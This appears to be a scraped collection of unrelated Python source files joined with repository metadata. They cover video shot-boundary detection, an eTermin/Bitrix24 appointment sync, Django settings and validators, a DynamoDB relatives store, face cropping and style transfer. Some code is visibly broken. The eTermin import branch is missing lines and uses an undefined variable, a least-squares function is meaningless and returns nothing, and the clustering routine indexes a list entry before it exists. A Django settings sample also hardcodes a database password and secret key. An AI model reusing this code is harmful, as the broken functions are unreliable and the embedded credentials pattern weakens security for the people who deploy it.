np.delete(frame_2, np.arange(0, start_index), axis=0)\n while higher_col <= cols:\n block_1 = extra_rows_group_1[:,np.arange(lower_col, higher_col)]\n block_2 = extra_rows_group_2[:,np.arange(lower_col, higher_col)]\n extra_rows_blocks_1 = np.vstack((extra_rows_blocks_1, block_1))\n extra_rows_blocks_2 = np.vstack((extra_rows_blocks_2, block_2))\n lower_col += step \n higher_col += step\n \n # Delete the leading zeros placeholder (it spans the full block height)\n extra_rows_blocks_1 = np.delete(extra_rows_blocks_1, np.arange(0, rows - start_index), axis=0)\n extra_rows_blocks_2 = np.delete(extra_rows_blocks_2, np.arange(0, rows - start_index), axis=0)\n\n # Get the blocks of the extra columns (Region 3)\n start_index = higher_col - step\n extra_cols_blocks_1 = None \n extra_cols_blocks_2 = None\n if start_index < cols:\n extra_cols_blocks_1 = np.zeros(shape=(4, cols - start_index))\n extra_cols_blocks_2 = np.zeros(shape=(4, cols - start_index))\n extra_cols_group_1 = np.delete(frame_1, np.arange(0, start_index), axis=1)\n extra_cols_group_2 = np.delete(frame_2, np.arange(0, start_index), axis=1)\n lower_row = 0\n higher_row = 4\n while higher_row <= rows:\n block_1 = extra_cols_group_1[np.arange(lower_row, higher_row),:]\n block_2 = extra_cols_group_2[np.arange(lower_row, higher_row),:]\n extra_cols_blocks_1 = np.vstack((extra_cols_blocks_1, block_1))\n extra_cols_blocks_2 = np.vstack((extra_cols_blocks_2, block_2))\n lower_row += step\n higher_row += step\n\n # Delete the leading zeros placeholder (its first 4 rows)\n extra_cols_blocks_1 = np.delete(extra_cols_blocks_1, np.arange(0, 4), axis=0)\n extra_cols_blocks_2 = np.delete(extra_cols_blocks_2, np.arange(0, 4), axis=0)\n\n return perfect_blocks_1, perfect_blocks_2, extra_rows_blocks_1, extra_rows_blocks_2, extra_cols_blocks_1, extra_cols_blocks_2\n\ndef get_diff_values(frame1, frame2):\n \"\"\"\n Gets the difference/continuity value for all corresponding blocks between 2 consecutive frames\n\n Returns\n ---------\n diff_values: array of type float and shape (N, )\n All difference values between corresponding blocks of 2 consecutive frames\n\n Notes\n -------\n Should return an array of shape(14400, ) for the frames we are using. 
\n We should expect a lot of zeros in this array since consecutive frames are likely to be similar.\n \"\"\"\n diff_values = np.array([])\n # pb1 and pb2 have shape (N, 4) where N is the total number of pixels divided by 4 \n pb1, pb2 = frame_blocks_perfect(frame1, frame2)\n start = 0\n step = 4\n while start < pb1.shape[0]:\n # will be a 4 x 4 block so must reshape to (16, )\n diff_value = None\n upper = start + step\n block_1 = pb1[range(start, upper),:].reshape(-1)\n block_2 = pb2[range(start, upper),:].reshape(-1)\n ep1 = get_block_edge_pattern(block_1)\n ep2 = get_block_edge_pattern(block_2)\n b1_is_edge = is_edge_block(ep1)\n b2_is_edge = is_edge_block(ep2)\n if b1_is_edge and b2_is_edge:\n diff_value = diff_both_edge_blocks(block_1, block_2)\n elif b1_is_edge and (not b2_is_edge):\n diff_value = diff_edge_nonedge(block_1, block_2)\n elif b2_is_edge and (not b1_is_edge):\n diff_value = diff_nonedge_edge(block_1, block_2)\n else:\n diff_value = diff_both_nonedge_blocks(block_1, block_2)\n # Append diff value to array of diff values\n diff_values = np.hstack((diff_values, diff_value))\n # Increment start by 4 to consider next pair of corresponding blocks\n start += 4\n\n return diff_values\n \n\ndef frame_continuity_value(diff_values):\n \"\"\"\n Computes the continuity value which represents ALL corresponding blocks in consecutive frames\n\n Parameters\n ----------\n diff_values: Array of shape (N, )\n The array that contains all the corresponding difference/similarity scores between 2 consecutive frames\n \n Returns\n -------\n continuity_value: float\n The continuity value between 2 consecutive frames\n \"\"\"\n return np.sum(diff_values)\n\ndef full_sequence_diff_vals(frame_dir):\n \"\"\"\n Computes the difference/continuity values between ALL consecutive frames in the video\n \"\"\"\n frame_names = listdir(frame_dir)\n full_sequence_diffs = np.array([])\n for i in range(len(frame_names) - 1):\n f1_name = frame_names[i]\n f2_name = frame_names[i + 1]\n f1 = np.load(join(frame_dir, f1_name))\n f2 = np.load(join(frame_dir, f2_name))\n f1_gray = rgb2gray(f1)\n f2_gray = rgb2gray(f2)\n diff_values = get_diff_values(f1_gray, f2_gray)\n cont_val = frame_continuity_value(diff_values)\n full_sequence_diffs = np.hstack((full_sequence_diffs, cont_val))\n \n return full_sequence_diffs\n\n \n###########################\n# 3.3 Least Squares #\n###########################\n\ndef least_squared_error(diff_values):\n g = diff_values * np.transpose(diff_values)\n m = np.zeros((2, len(diff_values)))\n m[0, :] = diff_values\n m[1, :] = diff_values\n\n m_zero = np.zeros((2, 2))\n\n h_0 = np.concatenate((g, np.transpose(m)), axis=1)\n h_1 = np.concatenate((m, m_zero), axis=1)\n h = np.concatenate((h_0, h_1), axis=0)\n\n b = h * diff_values\n\n f = None\n total = 0\n for i in range(1, len(diff_values) + 1):\n f = b[i + len(diff_values)]\n total += np.sum(diff_values)\n\n###########################\n# 3.4 Shot Frame Clustering#\n###########################\n\ndef shot_frame_clustering(diff_values):\n \"\"\"\n diff_values here is for the entire sequence of frames. 
has shape (N-1, ) where N is total number of frames\n \"\"\"\n delta = 5\n d = 1\n i = 1\n clusters = []\n clusters.append([diff_values[0]])\n i += 1\n cont_val = frame_continuity_value(diff_values)\n while i < len(diff_values):\n if diff_values[i] < delta:\n clusters[d] = np.append(clusters[d], i)\n elif len(clusters[d]) == 1:\n clusters[d - 1] = np.append(clusters[d - 1], i)\n elif len(clusters[d]) > 1 and len(clusters[d]) < 5:\n l = clusters[d - 1][len(clusters[d - 1]) - 1]\n f = clusters[d][0]\n s = clusters[d][1]\n\n if (diff_values[f] - diff_values[l]) - (diff_values[f] - diff_values[s]) < 0.5*delta:\n clusters[d - 1] = np.append(clusters[d], clusters[d - 1])\n clusters[d - 1] = np.ravel(clusters[d - 1])\n # merge cluster d into cluster d-1 and drop the emptied slot\n del clusters[d]\n else:\n d += 1\n i += 1\n \n return clusters\n \n\n\n\n\n","repo_name":"bzhulex/CV_Project","sub_path":"keyframe_extractors/edge_aware_clustering/shot_boundary_detection.py","file_name":"shot_boundary_detection.py","file_ext":"py","file_size_in_byte":18365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71099021492","text":"from operator import index\nimport base64\nimport re\nimport time\nimport json\nimport random\nimport pytz\nfrom datetime import datetime, timedelta\nimport dateutil.parser\n\nfrom app import db\nfrom app.modules.user import auto_assign_lead_to_user\nfrom app.modules.external.bitrix24.company import add_company\nfrom app.modules.external.bitrix24.contact import get_contact_by_email, add_contact\nfrom app.modules.external.bitrix24.deal import get_deals, add_deal\nfrom app.modules.external.bitrix24.task import get_tasks, update_task, get_task\nfrom app.modules.external.bitrix24.timeline_comment import add_timeline_comment\nfrom app.modules.external.mfr.task import get_linked_data_by_task\nfrom app.modules.settings import get_settings, set_settings\nfrom app.utils.error_handler import error_handler\nfrom app.utils.data_convert import street_to_street_with_nb, internationalize_phonenumber\n\nfrom ._connector import get, post, put\n\n\ndef import_new_appointments():\n print(\"import etermin\")\n config = get_settings(section=\"external/etermin\")\n syncToken = 1\n if \"SyncToken\" in config:\n syncToken = config[\"SyncToken\"]\n response = get(\"/api/appointmentsync\", parameters={\"synctoken\": syncToken})\n if response is not None and \"SyncToken\" in response:\n for appointment in response[\"data\"]:\n if appointment.get('SelectedAnswers') in [None, \"\"]:\n continue\n existing_deals = get_deals({\"filter[=UF_CRM_1614177772351]\": appointment['ID']}, force_reload=True)\n if len(existing_deals) == 0:\n contact = get_contact_by_email(appointment[\"Email\"])\n deal_data = {\n \"stage_id\": \"C134:NEW\",\n \"category_id\": \"134\"\n }\n startDatetime = dateutil.parser.parse(appointment['StartDateTime'])\n endDatetime = dateutil.parser.parse(appointment['EndDateTime'])\n if contact is None:\n 
f\"{contact['last_name']} {contact['first_name']} {contact['city']} am {startDatetime.strftime('%d.%m.%Y')}\"\n deal_data[\"service_appointment_notes\"] = f\"Wartungstermin für den {startDatetime.strftime('%d.%m.%Y %H:%M:%S')} bis {endDatetime.strftime('%d.%m.%Y %H:%M:%S')} // eTermin\"\n deal_data[\"service_appointment_date\"] = startDatetime.strftime('%d.%m.%Y')\n deal_data[\"service_appointment_startdate\"] = pytz.timezone(\"Europe/Berlin\").localize(startDatetime).isoformat()\n deal_data[\"service_appointment_enddate\"] = pytz.timezone(\"Europe/Berlin\").localize(endDatetime).isoformat()\n deal_data[\"etermin_id\"] = f\"{appointment['ID']}\"\n deal_data[\"comments\"] = f\"Name: {appointment['FirstName']} {appointment['LastName']}
\\nE-Mail: {appointment['Email']}
\\n\"\n deal_data[\"comments\"] = f\"{deal_data['comments']}Gebucht am: {appointment['BookingDate']}
\\nOrt: {appointment['Location']}
\\nThema: {appointment['SelectedAnswers']}
\\nKommentar: {appointment['Notes']}\"\n if appointment['SelectedAnswers'] == \"PV Anlage ohne Speicher\":\n deal_data[\"mfr_category\"] = \"service\"\n if appointment['SelectedAnswers'] == \"PV Anlage mit Lithiumspeicher\":\n deal_data[\"mfr_category\"] = \"service_pv_storage_li\"\n if appointment['SelectedAnswers'] == \"PV Anlage mit Bleispeicher\":\n deal_data[\"mfr_category\"] = \"service_pv_storage_pb\"\n if appointment['SelectedAnswers'] == \"Lithiumspeicher ohne Photovoltaik-Anlage\":\n deal_data[\"mfr_category\"] = \"service_storage_li\"\n if appointment['SelectedAnswers'] == \"Bleispeicher ohne Photovoltaik-Anlage\":\n deal_data[\"mfr_category\"] = \"service_storage_pb\"\n print(\"add deal\", add_deal(deal_data))\n config = get_settings(\"external/etermin\")\n if config is not None:\n config[\"SyncToken\"] = response[\"SyncToken\"]\n set_settings(\"external/etermin\", config)\n\n\ndef export_appointments():\n config = get_settings(\"external/etermin\")\n print(\"export task etermin\")\n if config is None:\n print(\"no config for export task etermin\")\n return None\n last_task_export_time = config.get(\"last_task_export_time\", \"2021-01-01\")\n tasks = get_tasks({\n \"select[0]\": \"TITLE\",\n \"select[1]\": \"DESCRIPTION\",\n \"select[2]\": \"UF_CRM_TASK\",\n \"select[3]\": \"CONTACT_ID\",\n \"select[4]\": \"COMPANY_ID\",\n \"select[5]\": \"TIME_ESTIMATE\",\n \"select[6]\": \"UF_AUTO_422491195439\",\n \"select[7]\": \"STATUS\",\n \"select[8]\": \"START_DATE_PLAN\",\n \"select[9]\": \"END_DATE_PLAN\",\n \"select[10]\": \"RESPONSIBLE_ID\",\n \"select[11]\": \"ACCOMPLICES\",\n \"select[12]\": \"SUBORDINATE\",\n \"select[13]\": \"AUDITORS\",\n \"select[14]\": \"DEADLINE\",\n \"select[15]\": \"UF_AUTO_219922666303\",\n \"select[16]\": \"UF_AUTO_343721853755\",\n \"select[17]\": \"UF_AUTO_513701476131\",\n \"filter[>CHANGED_DATE]\": last_task_export_time,\n \"filter[TITLE]\": \"%[mfr]%\"\n }, force_reload=True)\n last_task_export_time = datetime.now()\n if tasks is None:\n return\n for task in tasks:\n export_appointment(task)\n config = get_settings(\"external/etermin\")\n if config is not None:\n config[\"last_task_export_time\"] = last_task_export_time.astimezone().isoformat()\n set_settings(\"external/etermin\", config)\n\n\ndef export_appointment(task):\n print(\"export task \", task.get(\"id\"))\n if task.get(\"startDatePlan\") in [None, \"\", \"0\"]:\n print(\"no start date\")\n return\n if task.get(\"mfr_appointments\") in [0, \"\", None]:\n print(\"no mfr_appointments\")\n return\n if task.get(\"mfr_appointments\")[:1] in [\"{\", \"[\"]:\n appointments = json.loads(task.get(\"mfr_appointments\"))\n else:\n appointments = json.loads(base64.b64decode(task.get(\"mfr_appointments\").encode('utf-8')).decode('utf-8'))\n if task.get(\"etermin_appointments\") not in [0, \"\", None]:\n if task.get(\"etermin_appointments\")[:1] in [\"{\", \"[\"]:\n old_etermin_appointments = json.loads(task.get(\"etermin_appointments\"))\n else:\n old_etermin_appointments = json.loads(base64.b64decode(task.get(\"etermin_appointments\").encode('utf-8')).decode('utf-8'))\n else:\n old_etermin_appointments = []\n etermin_appointments = []\n i = 0\n for appointment in appointments:\n etermin_appointment = {\n \"start\": appointment.get(\"StartDateTime\"),\n \"end\": appointment.get(\"EndDateTime\"),\n \"bitrix_user_ids\": appointment.get(\"bitrix_user_ids\")\n }\n if i < len(old_etermin_appointments):\n if \"etermin_id\" in old_etermin_appointments[i]:\n etermin_appointment[\"etermin_id\"] = 
old_etermin_appointments[i][\"etermin_id\"]\n if i == 0:\n etermin_appointment[\"etermin_id\"] = task.get(\"etermin_id\")\n etermin_appointments.append(etermin_appointment)\n i = i + 1\n i = 0\n if json.dumps(old_etermin_appointments) != json.dumps(etermin_appointments) and len(etermin_appointments) > 0:\n for etermin_appointment in etermin_appointments:\n start_datetime = dateutil.parser.parse(etermin_appointment[\"start\"]).strftime(\"%Y-%m-%d %H:%M:%S\")\n end_datetime = dateutil.parser.parse(etermin_appointment[\"end\"]).strftime(\"%Y-%m-%d %H:%M:%S\")\n if etermin_appointment.get(\"etermin_id\") not in [None, \"\", \"0\"]:\n post_data = {\n \"id\": etermin_appointment.get(\"etermin_id\"),\n \"start\": start_datetime,\n \"end\": end_datetime\n }\n print(\"export task update etermin\", task[\"id\"])\n response = put(\"/api/appointment\", post_data=post_data)\n if response.get(\"status\", \"\") != \"success\":\n print(\"etermin-error:\", response)\n else:\n if \"90\" not in etermin_appointment.get(\"bitrix_user_ids\"):\n continue\n deal_data, contact_data, company_data = get_linked_data_by_task(task)\n if deal_data is not None and deal_data.get(\"etermin_id\") not in [None, \"\", \"0\"]:\n continue\n if deal_data is None and contact_data is None:\n continue\n post_data = {\n \"start\": start_datetime,\n \"end\": end_datetime,\n \"calendarid\": 93100,\n \"sendemail\": False\n }\n if company_data is not None:\n post_data[\"street\"] = company_data[\"street\"]\n post_data[\"zip\"] = company_data[\"zip\"]\n post_data[\"city\"] = company_data[\"city\"]\n if contact_data is not None:\n post_data[\"firstname\"] = contact_data[\"first_name\"]\n post_data[\"lastname\"] = contact_data[\"last_name\"]\n post_data[\"street\"] = contact_data[\"street\"]\n post_data[\"zip\"] = contact_data[\"zip\"]\n post_data[\"city\"] = contact_data[\"city\"]\n post_data[\"location\"] = f'{post_data[\"street\"]}, {post_data[\"zip\"]} {post_data[\"city\"]}'\n print(\"export task etermin\", task[\"id\"])\n response = post(\"/api/appointment\", post_data=post_data)\n if response is not None and \"cid\" in response:\n etermin_appointment[\"etermin_id\"] = response[\"cid\"]\n else:\n print(\"post_data:\", post_data)\n print(\"etermin-error:\", response)\n update_task(task[\"id\"], {\n \"etermin_id\": etermin_appointments[0][\"etermin_id\"],\n \"etermin_appointments\": base64.b64encode(json.dumps(etermin_appointments).encode('utf-8')).decode('utf-8')\n })\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"app/modules/external/etermin/appointment.py","file_name":"appointment.py","file_ext":"py","file_size_in_byte":10695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15732492207","text":"from rest_framework import serializers\nfrom .models import Order\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = [\n 'order_id', \n 'car_name', \n 'car_brand', \n 'car_model', \n 'service_name', \n 'service_cost',\n 'add_ons',\n 'is_done',\n 'total_cost',\n 'created_by',\n 'created_at',\n 'updated_at',\n 'assigned_to',\n 'booked_for_date'\n ]\n","repo_name":"gawdeparag/gcw_backend","sub_path":"gcw_order/order/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72299453814","text":"# Django settings for postfixadmin project.\n\nimport os.path\n\nROOT_PATH = 
os.path.dirname(os.path.abspath(__file__))\nJOIN = os.path.join\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Claudio Borges', 'cbsfilho@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'mysql'\nDATABASE_NAME = 'postfix'\nDATABASE_USER = 'postfix'\nDATABASE_PASSWORD = 'Eir3so0kae1Ae'\nDATABASE_HOST = 'localhost'\nDATABASE_PORT = '3306'\n\nTIME_ZONE = 'America/Sao_Paulo'\n\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nMEDIA_ROOT = '/usr/share/pyshared/django/contrib/admin/media/'\n\nMEDIA_URL = '/media/'\n\nADMIN_MEDIA_PREFIX = '/media/'\n\nSECRET_KEY = '&+x4&8&wqicd$0)$ssjq1$x)=d!x9(n)q4*jn231&cyyz@outi'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'postfixadmin.urls'\n\nTEMPLATE_DIRS = (\n JOIN(ROOT_PATH, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n\n # Postfixadmin extensions\n 'postfixadmin.aliases',\n 'postfixadmin.domains',\n 'postfixadmin.users',\n 'postfixadmin.autoresponse'\n)\n","repo_name":"linkedinyou/postfixadmin-1","sub_path":"settings_sample.py","file_name":"settings_sample.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16578602117","text":"import re\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import validate_email as validate_plain_email, EmailValidator\nfrom django.template import Template, TemplateSyntaxError\nfrom django.utils.encoding import force_text\n\nfrom .compat import text_type\n\nclass FullEmailValidator(EmailValidator):\n \"\"\" Simple validator that passes for email addresses bearing a display name\n i.e. John Smith \n\n Both \"Recipient Name \" and \"email@example.com\" are valid.\n\n \"\"\"\n def __call__(self, value):\n try:\n res = super(FullEmailValidator, self).__call__(value)\n except ValidationError:\n try:\n split_address = re.match(r'(.+) \\<(.+@.+)\\>', value)\n display_name, email = split_address.groups()\n super(FullEmailValidator, self).__call__(email)\n except AttributeError:\n raise ValidationError(self.message, code=self.code)\n\nvalidate_email_with_name = FullEmailValidator(**dict(validate_plain_email.__dict__))\n\n\ndef validate_comma_separated_emails(value):\n \"\"\"\n Validate every email address in a comma separated list of emails.\n \"\"\"\n if not isinstance(value, (tuple, list)):\n raise ValidationError('Email list must be a list/tuple.')\n\n for email in value:\n try:\n validate_email_with_name(email)\n except ValidationError:\n raise ValidationError('Invalid email: %s' % email, code='invalid')\n\n\ndef validate_template_syntax(source):\n \"\"\"\n Basic Django Template syntax validation. 
This allows for more robust template\n    authoring.\n    \"\"\"\n    try:\n        Template(source)\n    except TemplateSyntaxError as err:\n        raise ValidationError(text_type(err))\n","repo_name":"LeGast00n/django-post_office","sub_path":"post_office/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
+{"seq_id":"13342559017","text":"n = int(input())\r\na= list(map(int, input().split()))\r\nb= [i for i in a if sum([j for j in range(1,i) if i % j ==0 ]) > i]\r\nprint(len(b))\r\nprint(sorted(b))\r\n\r\na = input().split()\r\ndem =0\r\nfor i in range(len(a[1])):\r\n    if a[0] == a[1][i:i+len(a[0])]:\r\n        dem +=1\r\nprint(dem)\r\n# \r\nn = int(input())\r\ndem = 0 \r\nb = []\r\na = list(map(int, input().split()))\r\nfor i in a:\r\n    dem = 0\r\n    for j in range(1,i+1):\r\n        if i % j ==0 :\r\n            dem +=1\r\n    if dem ==3 :\r\n        b.append(i)\r\nif len(b) == 0:\r\n    print(\"KHÔNG\") \r\nelse:\r\n    print(len(b)) \r\n\r\na= list(map(str,input().split()))\r\nn = int(input())\r\nb = list(set(i for i in a[0]))\r\n\r\n\r\n\r\n","repo_name":"HungTien0910/PYTHON_HIT_PRIVATE","sub_path":"ktra.py","file_name":"ktra.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4966033524","text":"import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom relative import Relative\nfrom relation import Relation\nfrom util import reset_all_tables\nimport unittest\n\ndef get_ddb():\n    return boto3.resource('dynamodb', endpoint_url=\"http://localhost:8000\", region_name='us-west-2')\n\n\ndef get_table(table_name):\n    return get_ddb().Table(table_name)\n\n\ndef get_relative_table():\n    return get_table('relative')\n\n\ndef get_relation_table():\n    return get_table('relation')\n\n\n# Assuming no pagination\n# We need GSIs over the name and DOB\ndef get_relative_by_name(name):\n    response = get_relative_table().scan(FilterExpression=Attr('name').contains(name))\n    items = response['Items']\n    if items:\n        return [Relative.from_dict(item) for item in items]\n    return None\n\n\ndef get_relative_by_id(id):\n    response = get_relative_table().get_item(Key={'id': id})\n    item = response['Item']\n    if item:\n        return Relative.from_dict(item)\n    return None\n\n\ndef get_relatives(relative_id):\n    response = get_relation_table().query(KeyConditionExpression=Key('src').eq(relative_id))\n    relatives = {}\n\n    # There can be only one direct relation\n    # 1. Parent (Biological)\n    # 2. 
Spouse\n for item in response['Items']:\n relatives[item['dest']] = item['relation']\n\n return relatives\n\n\ndef add_relative(relative):\n get_relative_table().put_item(\n Item=relative.asdict(),\n ConditionExpression='attribute_not_exists(id)')\n\n\ndef add_relation(relation):\n get_relation_table().put_item(\n Item=relation.asdict(),\n ConditionExpression='attribute_not_exists(src)')\n\n\nif __name__ == '__main__':\n\n\n def relative_equality(one, other):\n return one.id == other.id and one.gender == other.gender \\\n and one.nickname == other.nickname \\\n and one.dob == other.dob and one.name == other.name\n\n # Create a relatives and relation table\n ddb = get_ddb()\n reset_all_tables(ddb)\n\n test = unittest.TestCase()\n\n # Add a relative\n write_relative = Relative('John Doe', '2016-01-01', 'Joe', 'male')\n add_relative(write_relative)\n\n # Read the relative back\n read_relative = get_relative_by_name(write_relative.name)[0]\n\n test.assertTrue(relative_equality(write_relative, read_relative))\n child = read_relative.id\n\n relative = Relative('Jane Doe', '1980-12-31', 'Jane', 'male')\n add_relative(relative)\n mother = relative.id\n\n # Add a relation\n add_relation(Relation(child, 'CHILD', mother, '2016-01-01'))\n add_relation(Relation(mother, 'PARENT', child, '2016-04-27'))\n\n # Get relation and verify\n child_relation = get_relatives(child)\n test.assertEqual(child_relation[mother], 'CHILD')\n","repo_name":"pashas2k3/Relative-Mapping","sub_path":"server/python_server/dynamo_layer.py","file_name":"dynamo_layer.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3437180087","text":"import mediapipe as mp\nfrom skimage import (\n transform,\n util,\n)\n\nimport config\nfrom lib.models.abstract_model import AbstractModel\n\n\ndef upscale_relative_bb(bb, alpha=0.75):\n h, w = bb.height, bb.width\n bb.xmin = max(0.0, bb.xmin - alpha * w / 2)\n bb.ymin = max(0.0, bb.ymin - alpha * h / 2)\n bb.width = min (1.0 - bb.xmin, bb.width * (1 + alpha))\n bb.height = min (1.0 - bb.ymin, bb.height * (1 + alpha))\n \n return bb\n\n\ndef crop_image_by_bb(image, bb):\n assert bb is not None, 'Bounding box is not provided'\n h, w, _ = image.shape\n cropped = util.crop(\n image,\n (\n (int(h * bb.ymin), int(h * (1 - bb.ymin - bb.height))),\n (int(w * bb.xmin), int(w * (1 - bb.xmin - bb.width))),\n (0,0)\n ),\n copy=True\n )\n return cropped\n\n\nclass FaceCropper(AbstractModel):\n def __init__(self):\n AbstractModel.__init__(self)\n\n self.mp_face_detection = mp.solutions.face_detection\n\n def apply(self, input):\n with self.mp_face_detection.FaceDetection(\n model_selection=1,\n min_detection_confidence=0.5,\n ) as face_detection:\n results = face_detection.process(input)\n\n bb = None\n \n for detection in results.detections:\n bb = upscale_relative_bb(detection.location_data.relative_bounding_box)\n\n if bb is None:\n return None\n\n cropped = crop_image_by_bb(input, bb)\n cropped = transform.resize(cropped, config.EMBEDDER_INPUT_SHAPE)\n\n return cropped\n","repo_name":"roma1n/face_clothes_matching","sub_path":"lib/models/face_cropper.py","file_name":"face_cropper.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3500623825","text":"import optparse\nimport os\nimport sys\n\nfrom common import chromium_utils\nfrom slave import slave_utils\n\n\ndef PerfTest(options):\n \"\"\"Call 
run-perf-tests.py, using Python from the tree.\"\"\"\n build_dir = os.path.abspath(options.build_dir)\n webkit_scripts_dir = chromium_utils.FindUpward(build_dir,\n 'third_party', 'WebKit', 'Tools', 'Scripts')\n run_perf_tests = os.path.join(webkit_scripts_dir, 'run-perf-tests')\n\n command = [run_perf_tests,\n '--time-out-ms=90000',\n '--no-results',\n '--force',\n 'inspector',\n ]\n\n command.append('--' + options.target.lower())\n\n if options.platform:\n command.extend(['--platform', options.platform])\n\n # Nuke anything that appears to be stale chrome items in the temporary\n # directory from previous test runs (i.e. from crashes or unittest leaks).\n slave_utils.RemoveChromeTemporaryFiles()\n\n # Run the the tests\n return slave_utils.RunPythonCommandInBuildDir(build_dir, options.target,\n command)\n\n\ndef main():\n option_parser = optparse.OptionParser()\n option_parser.add_option('--build-dir', default='src/out',\n help='path to main build directory (the parent of '\n 'the Release or Debug directory)')\n option_parser.add_option('--target', default='release',\n choices=['release', 'debug', 'Release', 'Debug'],\n help='DumpRenderTree build configuration (Release or Debug)')\n option_parser.add_option('--platform',\n help='Platform value passed directly to run-perf-tests.')\n options, args = option_parser.parse_args()\n if args:\n option_parser.error('Unknown argument, try --help')\n return PerfTest(options)\n\n\nif '__main__' == __name__:\n sys.exit(main())\n","repo_name":"sunny-bay/chromium30","sub_path":"build/scripts/slave/chromium/devtools_perf_test_wrapper.py","file_name":"devtools_perf_test_wrapper.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21738670586","text":"__author__ = \"Baishali Dutta\"\n__copyright__ = \"Copyright (C) 2021-2022 Baishali Dutta\"\n__license__ = \"Apache License 2.0\"\n__version__ = \"0.1\"\n\n# USAGE\n# python style_transfer.py\n\nimport os\n\nimport tensorflow as tf\nfrom pyimagesearch.nn.conv.neuralstyle import NeuralStyle\n\n# import necessary packages\nfrom config import style_transfer_config as config\n\n\ndef loadImage(imagePath):\n # specify the maximum dimension to which the image is to be\n # resized\n maxDim = 512\n\n # load the image from the given path, convert the image bytes\n # to a tensor, and convert the data type of the image\n image = tf.io.read_file(imagePath)\n image = tf.image.decode_image(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n\n # grab the height and width of the image, cast them to floats,\n # determine the larger dimension between height and width, and\n # determine the scaling factor\n shape = tf.cast(tf.shape(image)[:-1], tf.float32)\n long_dim = max(shape)\n scale = maxDim / long_dim\n\n # scale back the new shape, cast it to an integer, resize the\n # image to the new shape, and add a batch dimension\n new_shape = tf.cast(shape * scale, tf.int32)\n image = tf.image.resize(image, new_shape)\n image = image[tf.newaxis, :]\n\n # return the resized image\n return image\n\n\n@tf.function\ndef train_one_step(image, style_targets, content_targets):\n # derive the style and content loss weight values\n style_weight = config.style_weight / len(config.style_layers)\n content_weight = config.content_weight / len(config.content_layers)\n\n # keep track of our gradients\n with tf.GradientTape() as tape:\n # run the content image through our neural style network to\n # get its features, 
determine the loss, and add total\n # variational loss to regularize it\n outputs = extractor(image)\n loss = extractor.styleContentLoss(outputs, style_targets,\n content_targets, style_weight, content_weight)\n loss += config.tvWeight * tf.image.total_variation(image)\n\n # grab the gradients of the loss with respect to the image and\n # apply the gradients to update the image after clipping the\n # values to [0, 1] range\n grad = tape.gradient(loss, image)\n opt.apply_gradients([(grad, image)])\n image.assign(extractor.clipPixels(image))\n\n\n# initialize the Adam optimizer\nopt = tf.optimizers.Adam(learning_rate=0.01, beta_1=0.99,\n epsilon=1e-1)\n\n# load the content and style images\nprint(\"[INFO] loading content and style images...\")\ncontent_image = loadImage(config.content_image)\nstyle_image = loadImage(config.style_image)\n\n# grab the contents layer from which feature maps will be extracted\n# along with the style layer blocks\ncontent_layers = config.content_layers\nstyle_layers = config.style_layers\n\n# initialize the our network to extract features from the style and\n# content images\nprint(\"[INFO] initializing off the extractor network...\")\nextractor = NeuralStyle(style_layers, content_layers)\n\n# extract the features from the style and content images\nstyle_targets = extractor(style_image)[\"style\"]\ncontent_targets = extractor(content_image)[\"content\"]\n\n# initialize the content image as a TensorFlow variable along with\n# the total number of steps taken in the current epoch\nprint(\"[INFO] training the style transfer model...\")\nimage = tf.Variable(content_image)\nstep = 0\n\n# loop over the number of epochs\nfor epoch in range(config.epochs):\n # loop over the number of steps in the epoch\n for i in range(config.steps_per_epoch):\n # perform a single training step, then increment our step\n # counter\n train_one_step(image, style_targets, content_targets)\n step += 1\n\n # construct the path to the intermediate resulting image (for\n # visualization purposes) and save it\n print(\"[INFO] training step: {}\".format(step))\n p = \"_\".join([str(epoch), str(i)])\n p = \"{}.png\".format(p)\n p = os.path.join(config.interm_outputs, p)\n extractor.tensorToImage(image).save(p)\n\n# save the final stylized 